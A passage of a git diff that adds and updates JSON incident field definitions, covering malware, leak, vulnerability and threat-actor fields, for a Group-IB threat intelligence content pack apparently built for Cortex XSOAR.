"systemAssociatedTypes": [ + "GIB OSI Vulnerability" + ], + "threshold": 72, + "type": "longText", + "unmapped": false, + "unsearchable": false, + "useAsKpi": false, + "version": -1, + "fromVersion": "6.10.0" +} \ No newline at end of file diff --git a/Packs/GroupIB_ThreatIntelligenceAttribution/IncidentFields/incidentfield-GIB_Favicon.json b/Packs/GroupIB_ThreatIntelligenceAttribution/IncidentFields/incidentfield-GIB_Favicon.json index ace486ab9559..aa9fc489746f 100644 --- a/Packs/GroupIB_ThreatIntelligenceAttribution/IncidentFields/incidentfield-GIB_Favicon.json +++ b/Packs/GroupIB_ThreatIntelligenceAttribution/IncidentFields/incidentfield-GIB_Favicon.json @@ -25,5 +25,10 @@ "unsearchable": false, "useAsKpi": false, "version": -1, - "fromVersion": "6.0.0" + "fromVersion": "6.0.0", + "itemVersion": "1.4.2", + "openEnded": false, + "systemAssociatedTypes": [ + "GIB Brand Protection Domain" + ] } \ No newline at end of file diff --git a/Packs/GroupIB_ThreatIntelligenceAttribution/IncidentFields/incidentfield-GIB_GIT_Source.json b/Packs/GroupIB_ThreatIntelligenceAttribution/IncidentFields/incidentfield-GIB_GIT_Source.json new file mode 100644 index 000000000000..f539f48027fe --- /dev/null +++ b/Packs/GroupIB_ThreatIntelligenceAttribution/IncidentFields/incidentfield-GIB_GIT_Source.json @@ -0,0 +1,36 @@ +{ + "associatedToAll": false, + "associatedTypes": [ + "GIB OSI Git Leak" + ], + "caseInsensitive": true, + "cliName": "gibgitsource", + "closeForm": false, + "content": true, + "editForm": true, + "group": 0, + "hidden": false, + "id": "incident_gibgitsource", + "isReadOnly": false, + "locked": false, + "name": "GIB GIT Source", + "neverSetAsRequired": false, + "openEnded": false, + "ownerOnly": false, + "propagationLabels": [ + "all" + ], + "required": false, + "sla": 0, + "system": false, + "systemAssociatedTypes": [ + "GIB OSI Git Leak" + ], + "threshold": 72, + "type": "shortText", + "unmapped": false, + "unsearchable": false, + "useAsKpi": false, + "version": -1, + "fromVersion": "6.10.0" +} \ No newline at end of file diff --git a/Packs/GroupIB_ThreatIntelligenceAttribution/IncidentFields/incidentfield-GIB_HTML.json b/Packs/GroupIB_ThreatIntelligenceAttribution/IncidentFields/incidentfield-GIB_HTML.json index 7699013181a5..a4d59b9be3a0 100644 --- a/Packs/GroupIB_ThreatIntelligenceAttribution/IncidentFields/incidentfield-GIB_HTML.json +++ b/Packs/GroupIB_ThreatIntelligenceAttribution/IncidentFields/incidentfield-GIB_HTML.json @@ -25,5 +25,10 @@ "unsearchable": false, "useAsKpi": false, "version": -1, - "fromVersion": "6.0.0" + "fromVersion": "6.0.0", + "itemVersion": "1.4.2", + "openEnded": false, + "systemAssociatedTypes": [ + "GIB Brand Protection Domain" + ] } \ No newline at end of file diff --git a/Packs/GroupIB_ThreatIntelligenceAttribution/IncidentFields/incidentfield-GIB_Has_Exploit.json b/Packs/GroupIB_ThreatIntelligenceAttribution/IncidentFields/incidentfield-GIB_Has_Exploit.json new file mode 100644 index 000000000000..85bd50a86295 --- /dev/null +++ b/Packs/GroupIB_ThreatIntelligenceAttribution/IncidentFields/incidentfield-GIB_Has_Exploit.json @@ -0,0 +1,34 @@ +{ + "associatedToAll": false, + "associatedTypes": [ + "GIB OSI Vulnerability" + ], + "caseInsensitive": true, + "cliName": "gibhasexploit", + "closeForm": true, + "content": true, + "editForm": true, + "group": 0, + "hidden": false, + "id": "incident_gibhasexploit", + "isReadOnly": false, + "itemVersion": "1.4.2", + "locked": false, + "name": "GIB Has Exploit", + "neverSetAsRequired": false, + "openEnded": false, + "ownerOnly": false, + "required": false, + "sla": 0, + "system": false, + "systemAssociatedTypes": [ + "GIB OSI Vulnerability" + ], + "threshold": 72, + "type": "boolean", + "unmapped": false, + "unsearchable": false, + "useAsKpi": false, + "version": -1, + "fromVersion": "6.10.0" +} \ No newline at end of file diff --git a/Packs/GroupIB_ThreatIntelligenceAttribution/IncidentFields/incidentfield-GIB_Href.json b/Packs/GroupIB_ThreatIntelligenceAttribution/IncidentFields/incidentfield-GIB_Href.json new file mode 100644 index 000000000000..e4b6d9e7e1a8 --- /dev/null +++ b/Packs/GroupIB_ThreatIntelligenceAttribution/IncidentFields/incidentfield-GIB_Href.json @@ -0,0 +1,34 @@ +{ + "associatedToAll": false, + "associatedTypes": [ + "GIB OSI Vulnerability" + ], + "caseInsensitive": true, + "cliName": "gibhref", + "closeForm": true, + "content": true, + "editForm": true, + "group": 0, + "hidden": false, + "id": "incident_gibhref", + "isReadOnly": false, + "itemVersion": "1.4.2", + "locked": false, + "name": "GIB Href", + "neverSetAsRequired": false, + "openEnded": false, + "ownerOnly": false, + "required": false, + "sla": 0, + "system": false, + "systemAssociatedTypes": [ + "GIB OSI Vulnerability" + ], + "threshold": 72, + "type": "url", + "unmapped": false, + "unsearchable": false, + "useAsKpi": false, + "version": -1, + "fromVersion": "6.10.0" +} \ No newline at end of file diff --git a/Packs/GroupIB_ThreatIntelligenceAttribution/IncidentFields/incidentfield-GIB_ID.json b/Packs/GroupIB_ThreatIntelligenceAttribution/IncidentFields/incidentfield-GIB_ID.json index 36c70a2f3da3..d05f21fdcdb3 100644 --- a/Packs/GroupIB_ThreatIntelligenceAttribution/IncidentFields/incidentfield-GIB_ID.json +++ b/Packs/GroupIB_ThreatIntelligenceAttribution/IncidentFields/incidentfield-GIB_ID.json @@ -9,7 +9,26 @@ "GIB OSI Public Leak", "GIB Targeted Malware", "GIB Data Breach", - "GIB Brand Protection Domain" + "GIB Brand Protection Domain", + "GIB Compromised Account Group", + "GIB Compromised Card Group", + "GIB Compromised Mule", + "GIB OSI Vulnerability", + "GIB Attacks DDOS", + "GIB Attacks Deface", + "GIB Attacks Phishing Group", + "GIB Attacks Phishing Kit", + "GIB Suspicious IP TOR Node", + "GIB Suspicious IP Open Proxy", + "GIB Suspicious IP VPN", + "GIB Suspicious IP Scanner", + "GIB Malware", + "GIB Malware CNC", + "GIB Cybercriminal Threat", + "GIB Suspicious IP Socks Proxy", + "GIB Cybercriminal Threat Actor", + "GIB Nation-State Cybercriminals Threat Actor", + "GIB Nation-State Cybercriminals Threat" ], "caseInsensitive": false, "cliName": "gibid", @@ -34,5 +53,37 @@ "unsearchable": false, "useAsKpi": false, "version": -1, - "fromVersion": "6.0.0" + "fromVersion": "6.0.0", + "itemVersion": "1.4.2", + "openEnded": false, + "systemAssociatedTypes": [ + "GIB Brand Protection Phishing", + "GIB Brand Protection Phishing Kit", + "GIB Compromised Account", + "GIB Compromised Card", + "GIB OSI Git Leak", + "GIB OSI Public Leak", + "GIB Targeted Malware", + "GIB Data Breach", + "GIB Brand Protection Domain", + "GIB Compromised Account Group", + "GIB Compromised Card Group", + "GIB Compromised Mule", + "GIB OSI Vulnerability", + "GIB Attacks DDOS", + "GIB Attacks Deface", + "GIB Attacks Phishing Group", + "GIB Attacks Phishing Kit", + "GIB Suspicious IP TOR Node", + "GIB Suspicious IP Open Proxy", + "GIB Suspicious IP VPN", + "GIB Suspicious IP Scanner", + "GIB Malware", + "GIB Malware CNC", + "GIB Cybercriminal Threat", + "GIB Suspicious IP Socks Proxy", + "GIB Cybercriminal Threat Actor", + "GIB Nation-State Cybercriminals Threat Actor", + "GIB Nation-State Cybercriminals Threat" + ] } \ No newline at end of file diff --git a/Packs/GroupIB_ThreatIntelligenceAttribution/IncidentFields/incidentfield-GIB_Inject_Dump.json b/Packs/GroupIB_ThreatIntelligenceAttribution/IncidentFields/incidentfield-GIB_Inject_Dump.json index 9c52c9d9ece9..98b7ad93c73b 100644 --- a/Packs/GroupIB_ThreatIntelligenceAttribution/IncidentFields/incidentfield-GIB_Inject_Dump.json +++ b/Packs/GroupIB_ThreatIntelligenceAttribution/IncidentFields/incidentfield-GIB_Inject_Dump.json @@ -25,5 +25,10 @@ "unsearchable": false, "useAsKpi": false, "version": -1, - "fromVersion": "6.0.0" + "fromVersion": "6.0.0", + "itemVersion": "1.4.2", + "openEnded": false, + "systemAssociatedTypes": [ + "GIB Targeted Malware" + ] } \ No newline at end of file diff --git a/Packs/GroupIB_ThreatIntelligenceAttribution/IncidentFields/incidentfield-GIB_Inject_MD5.json b/Packs/GroupIB_ThreatIntelligenceAttribution/IncidentFields/incidentfield-GIB_Inject_MD5.json index a2a5837b5403..504046fcb66f 100644 --- a/Packs/GroupIB_ThreatIntelligenceAttribution/IncidentFields/incidentfield-GIB_Inject_MD5.json +++ b/Packs/GroupIB_ThreatIntelligenceAttribution/IncidentFields/incidentfield-GIB_Inject_MD5.json @@ -26,7 +26,9 @@ "useAsKpi": false, "version": -1, "fromVersion": "6.0.0", - "marketplaces": [ - "xsoar" + "itemVersion": "1.4.2", + "openEnded": false, + "systemAssociatedTypes": [ + "GIB Targeted Malware" ] } \ No newline at end of file diff --git a/Packs/GroupIB_ThreatIntelligenceAttribution/IncidentFields/incidentfield-GIB_Is_Tailored.json b/Packs/GroupIB_ThreatIntelligenceAttribution/IncidentFields/incidentfield-GIB_Is_Tailored.json new file mode 100644 index 000000000000..af281317c835 --- /dev/null +++ b/Packs/GroupIB_ThreatIntelligenceAttribution/IncidentFields/incidentfield-GIB_Is_Tailored.json @@ -0,0 +1,36 @@ +{ + "associatedToAll": false, + "associatedTypes": [ + "GIB Cybercriminal Threat", + "GIB Nation-State Cybercriminals Threat" + ], + "caseInsensitive": true, + "cliName": "gibistailored", + "closeForm": true, + "content": true, + "editForm": true, + "group": 0, + "hidden": false, + "id": "incident_gibistailored", + "isReadOnly": false, + "itemVersion": "1.4.2", + "locked": false, + "name": "GIB Is Tailored", + "neverSetAsRequired": false, + "openEnded": false, + "ownerOnly": false, + "required": false, + "sla": 0, + "system": false, + "systemAssociatedTypes": [ + "GIB Cybercriminal Threat", + "GIB Nation-State Cybercriminals Threat" + ], + "threshold": 72, + "type": "tagsSelect", + "unmapped": false, + "unsearchable": false, + "useAsKpi": false, + "version": -1, + "fromVersion": "6.10.0" +} \ No newline at end of file diff --git a/Packs/GroupIB_ThreatIntelligenceAttribution/IncidentFields/incidentfield-GIB_Leak_Name.json b/Packs/GroupIB_ThreatIntelligenceAttribution/IncidentFields/incidentfield-GIB_Leak_Name.json index c1e94d11f2cb..820868965af9 100644 --- a/Packs/GroupIB_ThreatIntelligenceAttribution/IncidentFields/incidentfield-GIB_Leak_Name.json +++ b/Packs/GroupIB_ThreatIntelligenceAttribution/IncidentFields/incidentfield-GIB_Leak_Name.json @@ -25,5 +25,10 @@ "unsearchable": false, "useAsKpi": false, "version": -1, - "fromVersion": "6.0.0" + "fromVersion": "6.0.0", + "itemVersion": "1.4.2", + "openEnded": false, + "systemAssociatedTypes": [ + "GIB Data Breach" + ] } \ No newline at end of file diff --git a/Packs/GroupIB_ThreatIntelligenceAttribution/IncidentFields/incidentfield-GIB_Leak_Published.json b/Packs/GroupIB_ThreatIntelligenceAttribution/IncidentFields/incidentfield-GIB_Leak_Published.json new file mode 100644 index 000000000000..d2f957d07a34 --- /dev/null +++ b/Packs/GroupIB_ThreatIntelligenceAttribution/IncidentFields/incidentfield-GIB_Leak_Published.json @@ -0,0 +1,33 @@ +{ + "associatedToAll": false, + "associatedTypes": [ + "GIB Data Breach" + ], + "caseInsensitive": true, + "cliName": "gibleakpublished", + "closeForm": true, + "content": true, + "editForm": true, + "group": 0, + "hidden": false, + "id": "incident_gibleakpublished", + "isReadOnly": false, + "locked": false, + "name": "GIB Leak Published", + "neverSetAsRequired": false, + "openEnded": false, + "ownerOnly": false, + "required": false, + "sla": 0, + "system": false, + "systemAssociatedTypes": [ + "GIB Data Breach" + ], + "threshold": 72, + "type": "date", + "unmapped": false, + "unsearchable": false, + "useAsKpi": false, + "version": -1, + "fromVersion": "6.10.0" +} \ No newline at end of file diff --git a/Packs/GroupIB_ThreatIntelligenceAttribution/IncidentFields/incidentfield-GIB_Leaked_Data.json b/Packs/GroupIB_ThreatIntelligenceAttribution/IncidentFields/incidentfield-GIB_Leaked_Data.json index eaf9c5313735..a089ff1a4890 100644 --- a/Packs/GroupIB_ThreatIntelligenceAttribution/IncidentFields/incidentfield-GIB_Leaked_Data.json +++ b/Packs/GroupIB_ThreatIntelligenceAttribution/IncidentFields/incidentfield-GIB_Leaked_Data.json @@ -25,5 +25,10 @@ "unsearchable": false, "useAsKpi": false, "version": -1, - "fromVersion": "6.0.0" + "fromVersion": "6.0.0", + "itemVersion": "1.4.2", + "openEnded": false, + "systemAssociatedTypes": [ + "GIB OSI Public Leak" + ] } \ No newline at end of file diff --git a/Packs/GroupIB_ThreatIntelligenceAttribution/IncidentFields/incidentfield-GIB_Leaked_File_Name.json b/Packs/GroupIB_ThreatIntelligenceAttribution/IncidentFields/incidentfield-GIB_Leaked_File_Name.json index 704c55b7b623..d92d8af97fe5 100644 --- a/Packs/GroupIB_ThreatIntelligenceAttribution/IncidentFields/incidentfield-GIB_Leaked_File_Name.json +++ b/Packs/GroupIB_ThreatIntelligenceAttribution/IncidentFields/incidentfield-GIB_Leaked_File_Name.json @@ -26,7 +26,9 @@ "useAsKpi": false, "version": -1, "fromVersion": "6.0.0", - "marketplaces": [ - "xsoar" + "itemVersion": "1.4.2", + "openEnded": false, + "systemAssociatedTypes": [ + "GIB OSI Git Leak" ] } \ No newline at end of file diff --git a/Packs/GroupIB_ThreatIntelligenceAttribution/IncidentFields/incidentfield-GIB_Link_List_Table.json b/Packs/GroupIB_ThreatIntelligenceAttribution/IncidentFields/incidentfield-GIB_Link_List_Table.json new file mode 100644 index 000000000000..a8084ec7f080 --- /dev/null +++ b/Packs/GroupIB_ThreatIntelligenceAttribution/IncidentFields/incidentfield-GIB_Link_List_Table.json @@ -0,0 +1,132 @@ +{ + "associatedToAll": false, + "associatedTypes": [ + "GIB OSI Public Leak" + ], + "caseInsensitive": true, + "cliName": "giblinklisttable", + "closeForm": true, + "columns": [ + { + "displayName": "Author", + "fieldCalcScript": "", + "isDefault": true, + "isReadOnly": false, + "key": "author", + "orgType": "shortText", + "required": false, + "script": "", + "selectValues": null, + "type": "shortText", + "width": 150 + }, + { + "displayName": "Hash", + "fieldCalcScript": "", + "isDefault": true, + "isReadOnly": false, + "key": "hash", + "orgType": "shortText", + "required": false, + "script": "", + "selectValues": null, + "type": "shortText", + "width": 150 + }, + { + "displayName": "Link", + "fieldCalcScript": "", + "isDefault": true, + "isReadOnly": false, + "key": "link", + "orgType": "url", + "required": false, + "script": "", + "selectValues": null, + "type": "url", + "width": 150 + }, + { + "displayName": "Title", + "fieldCalcScript": "", + "isDefault": true, + "isReadOnly": false, + "key": "title", + "orgType": "shortText", + "required": false, + "script": "", + "selectValues": null, + "type": "shortText", + "width": 150 + }, + { + "displayName": "Source", + "fieldCalcScript": "", + "isDefault": true, + "isReadOnly": false, + "key": "source", + "orgType": "shortText", + "required": false, + "script": "", + "selectValues": null, + "type": "shortText", + "width": 150 + }, + { + "displayName": "Date Detected", + "fieldCalcScript": "", + "isDefault": true, + "isReadOnly": false, + "key": "datedetected", + "orgType": "date", + "required": false, + "script": "", + "selectValues": null, + "type": "date", + "width": 150 + }, + { + "displayName": "Date Published", + "fieldCalcScript": "", + "isDefault": true, + "isReadOnly": false, + "key": "datepublished", + "orgType": "date", + "required": false, + "script": "", + "selectValues": null, + "type": "date", + "width": 150 + } + ], + "content": true, + "defaultRows": [ + {} + ], + "editForm": true, + "group": 0, + "hidden": false, + "id": "incident_giblinklisttable", + "isReadOnly": false, + "locked": false, + "name": "GIB Link List Table", + "neverSetAsRequired": false, + "openEnded": false, + "ownerOnly": false, + "propagationLabels": [ + "all" + ], + "required": false, + "sla": 0, + "system": false, + "systemAssociatedTypes": [ + "GIB OSI Public Leak" + ], + "threshold": 72, + "type": "grid", + "unmapped": false, + "unsearchable": false, + "useAsKpi": false, + "version": -1, + "fromVersion": "6.10.0" +} \ No newline at end of file diff --git a/Packs/GroupIB_ThreatIntelligenceAttribution/IncidentFields/incidentfield-GIB_Malware_Aliases.json b/Packs/GroupIB_ThreatIntelligenceAttribution/IncidentFields/incidentfield-GIB_Malware_Aliases.json new file mode 100644 index 000000000000..1c151b444968 --- /dev/null +++ b/Packs/GroupIB_ThreatIntelligenceAttribution/IncidentFields/incidentfield-GIB_Malware_Aliases.json @@ -0,0 +1,34 @@ +{ + "associatedToAll": false, + "associatedTypes": [ + "GIB Malware" + ], + "caseInsensitive": true, + "cliName": "gibmalwarealiases", + "closeForm": true, + "content": true, + "editForm": true, + "group": 0, + "hidden": false, + "id": "incident_gibmalwarealiases", + "isReadOnly": false, + "itemVersion": "1.4.2", + "locked": false, + "name": "GIB Malware Aliases", + "neverSetAsRequired": false, + "openEnded": true, + "ownerOnly": false, + "required": false, + "sla": 0, + "system": false, + "systemAssociatedTypes": [ + "GIB Malware" + ], + "threshold": 72, + "type": "multiSelect", + "unmapped": false, + "unsearchable": false, + "useAsKpi": false, + "version": -1, + "fromVersion": "6.10.0" +} \ No newline at end of file diff --git a/Packs/GroupIB_ThreatIntelligenceAttribution/IncidentFields/incidentfield-GIB_Malware_CNC_Domain.json b/Packs/GroupIB_ThreatIntelligenceAttribution/IncidentFields/incidentfield-GIB_Malware_CNC_Domain.json new file mode 100644 index 000000000000..3d7afbca5376 --- /dev/null +++ b/Packs/GroupIB_ThreatIntelligenceAttribution/IncidentFields/incidentfield-GIB_Malware_CNC_Domain.json @@ -0,0 +1,34 @@ +{ + "associatedToAll": false, + "associatedTypes": [ + "GIB Malware CNC" + ], + "caseInsensitive": true, + "cliName": "gibmalwarecncdomain", + "closeForm": true, + "content": true, + "editForm": true, + "group": 0, + "hidden": false, + "id": "incident_gibmalwarecncdomain", + "isReadOnly": false, + "itemVersion": "1.4.2", + "locked": false, + "name": "GIB Malware CNC Domain", + "neverSetAsRequired": false, + "openEnded": false, + "ownerOnly": false, + "required": false, + "sla": 0, + "system": false, + "systemAssociatedTypes": [ + "GIB Malware CNC" + ], + "threshold": 72, + "type": "shortText", + "unmapped": false, + "unsearchable": false, + "useAsKpi": false, + "version": -1, + "fromVersion": "6.10.0" +} \ No newline at end of file diff --git a/Packs/GroupIB_ThreatIntelligenceAttribution/IncidentFields/incidentfield-GIB_Malware_Categories.json b/Packs/GroupIB_ThreatIntelligenceAttribution/IncidentFields/incidentfield-GIB_Malware_Categories.json new file mode 100644 index 000000000000..3a8f59d9b3fe --- /dev/null +++ b/Packs/GroupIB_ThreatIntelligenceAttribution/IncidentFields/incidentfield-GIB_Malware_Categories.json @@ -0,0 +1,34 @@ +{ + "associatedToAll": false, + "associatedTypes": [ + "GIB Malware" + ], + "caseInsensitive": true, + "cliName": "gibmalwarecategories", + "closeForm": true, + "content": true, + "editForm": true, + "group": 0, + "hidden": false, + "id": "incident_gibmalwarecategories", + "isReadOnly": false, + "itemVersion": "1.4.2", + "locked": false, + "name": "GIB Malware Categories", + "neverSetAsRequired": false, + "openEnded": true, + "ownerOnly": false, + "required": false, + "sla": 0, + "system": false, + "systemAssociatedTypes": [ + "GIB Malware" + ], + "threshold": 72, + "type": "multiSelect", + "unmapped": false, + "unsearchable": false, + "useAsKpi": false, + "version": -1, + "fromVersion": "6.10.0" +} \ No newline at end of file diff --git a/Packs/GroupIB_ThreatIntelligenceAttribution/IncidentFields/incidentfield-GIB_Malware_Description.json b/Packs/GroupIB_ThreatIntelligenceAttribution/IncidentFields/incidentfield-GIB_Malware_Description.json new file mode 100644 index 000000000000..56402bac8ce3 --- /dev/null +++ b/Packs/GroupIB_ThreatIntelligenceAttribution/IncidentFields/incidentfield-GIB_Malware_Description.json @@ -0,0 +1,34 @@ +{ + "associatedToAll": false, + "associatedTypes": [ + "GIB Malware" + ], + "caseInsensitive": true, + "cliName": "gibmalwaredescription", + "closeForm": true, + "content": true, + "editForm": true, + "group": 0, + "hidden": false, + "id": "incident_gibmalwaredescription", + "isReadOnly": false, + "itemVersion": "1.4.2", + "locked": false, + "name": "GIB Malware Description", + "neverSetAsRequired": false, + "openEnded": false, + "ownerOnly": false, + "required": false, + "sla": 0, + "system": false, + "systemAssociatedTypes": [ + "GIB Malware" + ], + "threshold": 72, + "type": "longText", + "unmapped": false, + "unsearchable": false, + "useAsKpi": false, + "version": -1, + "fromVersion": "6.10.0" +} \ No newline at end of file diff --git a/Packs/GroupIB_ThreatIntelligenceAttribution/IncidentFields/incidentfield-GIB_Malware_File_hash.json b/Packs/GroupIB_ThreatIntelligenceAttribution/IncidentFields/incidentfield-GIB_Malware_File_hash.json new file mode 100644 index 000000000000..5bb708bf07f3 --- /dev/null +++ b/Packs/GroupIB_ThreatIntelligenceAttribution/IncidentFields/incidentfield-GIB_Malware_File_hash.json @@ -0,0 +1,34 @@ +{ + "associatedToAll": false, + "associatedTypes": [ + "GIB Malware" + ], + "caseInsensitive": true, + "cliName": "gibmalwarefilehash", + "closeForm": true, + "content": true, + "editForm": true, + "group": 0, + "hidden": false, + "id": "incident_gibmalwarefilehash", + "isReadOnly": false, + "itemVersion": "1.4.2", + "locked": false, + "name": "GIB Malware File hash", + "neverSetAsRequired": false, + "openEnded": true, + "ownerOnly": false, + "required": false, + "sla": 0, + "system": false, + "systemAssociatedTypes": [ + "GIB Malware" + ], + "threshold": 72, + "type": "multiSelect", + "unmapped": false, + "unsearchable": false, + "useAsKpi": false, + "version": -1, + "fromVersion": "6.10.0" +} \ No newline at end of file diff --git a/Packs/GroupIB_ThreatIntelligenceAttribution/IncidentFields/incidentfield-GIB_Malware_Langs.json b/Packs/GroupIB_ThreatIntelligenceAttribution/IncidentFields/incidentfield-GIB_Malware_Langs.json new file mode 100644 index 000000000000..cf7979ff37fd --- /dev/null +++ b/Packs/GroupIB_ThreatIntelligenceAttribution/IncidentFields/incidentfield-GIB_Malware_Langs.json @@ -0,0 +1,34 @@ +{ + "associatedToAll": false, + "associatedTypes": [ + "GIB Malware" + ], + "caseInsensitive": true, + "cliName": "gibmalwarelangs", + "closeForm": true, + "content": true, + "editForm": true, + "group": 0, + "hidden": false, + "id": "incident_gibmalwarelangs", + "isReadOnly": false, + "itemVersion": "1.4.2", + "locked": false, + "name": "GIB Malware Langs", + "neverSetAsRequired": false, + "openEnded": true, + "ownerOnly": false, + "required": false, + "sla": 0, + "system": false, + "systemAssociatedTypes": [ + "GIB Malware" + ], + "threshold": 72, + "type": "multiSelect", + "unmapped": false, + "unsearchable": false, + "useAsKpi": false, + "version": -1, + "fromVersion": "6.10.0" +} \ No newline at end of file diff --git a/Packs/GroupIB_ThreatIntelligenceAttribution/IncidentFields/incidentfield-GIB_Malware_Name.json b/Packs/GroupIB_ThreatIntelligenceAttribution/IncidentFields/incidentfield-GIB_Malware_Name.json index 828e7520d565..d827de03f46e 100644 --- a/Packs/GroupIB_ThreatIntelligenceAttribution/IncidentFields/incidentfield-GIB_Malware_Name.json +++ b/Packs/GroupIB_ThreatIntelligenceAttribution/IncidentFields/incidentfield-GIB_Malware_Name.json @@ -3,7 +3,9 @@ "associatedTypes": [ "GIB Compromised Account", "GIB Compromised Card", - "GIB Targeted Malware" + "GIB Targeted Malware", + "GIB Attacks DDOS", + "GIB Malware" ], "caseInsensitive": false, "cliName": "gibmalwarename", @@ -27,5 +29,14 @@ "unsearchable": false, "useAsKpi": false, "version": -1, - "fromVersion": "6.0.0" + "fromVersion": "6.0.0", + "itemVersion": "1.4.2", + "openEnded": false, + "systemAssociatedTypes": [ + "GIB Compromised Account", + "GIB Compromised Card", + "GIB Targeted Malware", + "GIB Attacks DDOS", + "GIB Malware" + ] } \ No newline at end of file diff --git a/Packs/GroupIB_ThreatIntelligenceAttribution/IncidentFields/incidentfield-GIB_Malware_Platforms.json b/Packs/GroupIB_ThreatIntelligenceAttribution/IncidentFields/incidentfield-GIB_Malware_Platforms.json new file mode 100644 index 000000000000..b7d6f3fbb677 --- /dev/null +++ b/Packs/GroupIB_ThreatIntelligenceAttribution/IncidentFields/incidentfield-GIB_Malware_Platforms.json @@ -0,0 +1,34 @@ +{ + "associatedToAll": false, + "associatedTypes": [ + "GIB Malware" + ], + "caseInsensitive": true, + "cliName": "gibmalwareplatforms", + "closeForm": true, + "content": true, + "editForm": true, + "group": 0, + "hidden": false, + "id": "incident_gibmalwareplatforms", + "isReadOnly": false, + "itemVersion": "1.4.2", + "locked": false, + "name": "GIB Malware Platforms", + "neverSetAsRequired": false, + "openEnded": true, + "ownerOnly": false, + "required": false, + "sla": 0, + "system": false, + "systemAssociatedTypes": [ + "GIB Malware" + ], + "threshold": 72, + "type": "multiSelect", + "unmapped": false, + "unsearchable": false, + "useAsKpi": false, + "version": -1, + "fromVersion": "6.10.0" +} \ No newline at end of file diff --git a/Packs/GroupIB_ThreatIntelligenceAttribution/IncidentFields/incidentfield-GIB_Malware_Regions.json b/Packs/GroupIB_ThreatIntelligenceAttribution/IncidentFields/incidentfield-GIB_Malware_Regions.json new file mode 100644 index 000000000000..95d5bd31df42 --- /dev/null +++ b/Packs/GroupIB_ThreatIntelligenceAttribution/IncidentFields/incidentfield-GIB_Malware_Regions.json @@ -0,0 +1,34 @@ +{ + "associatedToAll": false, + "associatedTypes": [ + "GIB Malware" + ], + "caseInsensitive": true, + "cliName": "gibmalwareregions", + "closeForm": true, + "content": true, + "editForm": true, + "group": 0, + "hidden": false, + "id": "incident_gibmalwareregions", + "isReadOnly": false, + "itemVersion": "1.4.2", + "locked": false, + "name": "GIB Malware Regions", + "neverSetAsRequired": false, + "openEnded": true, + "ownerOnly": false, + "required": false, + "sla": 0, + "system": false, + "systemAssociatedTypes": [ + "GIB Malware" + ], + "threshold": 72, + "type": "multiSelect", + "unmapped": false, + "unsearchable": false, + "useAsKpi": false, + "version": -1, + "fromVersion": "6.10.0" +} \ No newline at end of file diff --git a/Packs/GroupIB_ThreatIntelligenceAttribution/IncidentFields/incidentfield-GIB_Malware_Short_Description.json b/Packs/GroupIB_ThreatIntelligenceAttribution/IncidentFields/incidentfield-GIB_Malware_Short_Description.json new file mode 100644 index 000000000000..380b56b0aa16 --- /dev/null +++ b/Packs/GroupIB_ThreatIntelligenceAttribution/IncidentFields/incidentfield-GIB_Malware_Short_Description.json @@ -0,0 +1,34 @@ +{ + "associatedToAll": false, + "associatedTypes": [ + "GIB Malware" + ], + "caseInsensitive": true, + "cliName": "gibmalwareshortdescription", + "closeForm": true, + "content": true, + "editForm": true, + "group": 0, + "hidden": false, + "id": "incident_gibmalwareshortdescription", + "isReadOnly": false, + "itemVersion": "1.4.2", + "locked": false, + "name": "GIB Malware Short Description", + "neverSetAsRequired": false, + "openEnded": false, + "ownerOnly": false, + "required": false, + "sla": 0, + "system": false, + "systemAssociatedTypes": [ + "GIB Malware" + ], + "threshold": 72, + "type": "longText", + "unmapped": false, + "unsearchable": false, + "useAsKpi": false, + "version": -1, + "fromVersion": "6.10.0" +} \ No newline at end of file diff --git a/Packs/GroupIB_ThreatIntelligenceAttribution/IncidentFields/incidentfield-GIB_Malware_Source_Countries.json b/Packs/GroupIB_ThreatIntelligenceAttribution/IncidentFields/incidentfield-GIB_Malware_Source_Countries.json new file mode 100644 index 000000000000..ba7679ab375d --- /dev/null +++ b/Packs/GroupIB_ThreatIntelligenceAttribution/IncidentFields/incidentfield-GIB_Malware_Source_Countries.json @@ -0,0 +1,34 @@ +{ + "associatedToAll": false, + "associatedTypes": [ + "GIB Malware" + ], + "caseInsensitive": true, + "cliName": "gibmalwaresourcecountries", + "closeForm": true, + "content": true, + "editForm": true, + "group": 0, + "hidden": false, + "id": "incident_gibmalwaresourcecountries", + "isReadOnly": false, + "itemVersion": "1.4.2", + "locked": false, + "name": "GIB Malware Source Countries", + "neverSetAsRequired": false, + "openEnded": true, + "ownerOnly": false, + "required": false, + "sla": 0, + "system": false, + "systemAssociatedTypes": [ + "GIB Malware" + ], + "threshold": 72, + "type": "multiSelect", + "unmapped": false, + "unsearchable": false, + "useAsKpi": false, + "version": -1, + "fromVersion": "6.10.0" +} \ No newline at end of file diff --git a/Packs/GroupIB_ThreatIntelligenceAttribution/IncidentFields/incidentfield-GIB_Malware_Table.json b/Packs/GroupIB_ThreatIntelligenceAttribution/IncidentFields/incidentfield-GIB_Malware_Table.json new file mode 100644 index 000000000000..6bf2b1beb94a --- /dev/null +++ b/Packs/GroupIB_ThreatIntelligenceAttribution/IncidentFields/incidentfield-GIB_Malware_Table.json @@ -0,0 +1,67 @@ +{ + "associatedToAll": false, + "associatedTypes": [ + "GIB Compromised Card Group" + ], + "caseInsensitive": true, + "cliName": "gibmalwaretable", + "closeForm": true, + "columns": [ + { + "displayName": "ID", + "fieldCalcScript": "", + "isDefault": true, + "isReadOnly": false, + "key": "id", + "orgType": "shortText", + "required": false, + "script": "", + "selectValues": null, + "type": "shortText", + "width": 150 + }, + { + "displayName": "Name", + "fieldCalcScript": "", + "isDefault": true, + "isReadOnly": false, + "key": "name", + "orgType": "shortText", + "required": false, + "script": "", + "selectValues": null, + "type": "shortText", + "width": 150 + } + ], + "content": true, + "defaultRows": [ + {} + ], + "editForm": true, + "group": 0, + "hidden": false, + "id": "incident_gibmalwaretable", + "isReadOnly": false, + "locked": false, + "name": "GIB Malware Table", + "neverSetAsRequired": false, + "openEnded": false, + "ownerOnly": false, + "propagationLabels": [ + "all" + ], + "required": false, + "sla": 0, + "system": false, + "systemAssociatedTypes": [ + "GIB Compromised Card Group" + ], + "threshold": 72, + "type": "grid", + "unmapped": false, + "unsearchable": false, + "useAsKpi": false, + "version": -1, + "fromVersion": "6.10.0" +} \ No newline at end of file diff --git a/Packs/GroupIB_ThreatIntelligenceAttribution/IncidentFields/incidentfield-GIB_Matches_Table.json b/Packs/GroupIB_ThreatIntelligenceAttribution/IncidentFields/incidentfield-GIB_Matches_Table.json new file mode 100644 index 000000000000..5bdfb36b28cb --- /dev/null +++ 